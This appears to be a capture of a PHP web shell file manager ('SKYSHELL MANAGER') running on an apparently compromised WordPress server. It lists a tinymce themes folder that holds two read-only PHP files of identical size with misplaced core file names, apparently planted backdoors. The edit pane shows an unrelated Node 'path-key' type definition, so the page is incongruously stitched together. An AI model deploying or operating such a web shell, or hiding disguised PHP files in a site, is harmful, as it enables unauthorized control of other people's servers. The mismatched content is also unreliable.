📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: index.d.ts
export interface Options { /** Use a custom environment variables object. Default: [`process.env`](https://nodejs.org/api/process.html#process_process_env). */ readonly env?: Record<string, string | undefined>; /** Get the PATH key for a specific platform. Default: [`process.platform`](https://nodejs.org/api/process.html#process_process_platform). */ readonly platform?: NodeJS.Platform; } /** Get the [PATH](https://en.wikipedia.org/wiki/PATH_(variable)) environment variable key cross-platform. @example ``` import pathKey from 'path-key'; const key = pathKey(); //=> 'PATH' const PATH = process.env[key]; //=> '/usr/local/bin:/usr/bin:/bin' ``` */ export default function pathKey(options?: Options): string;
Save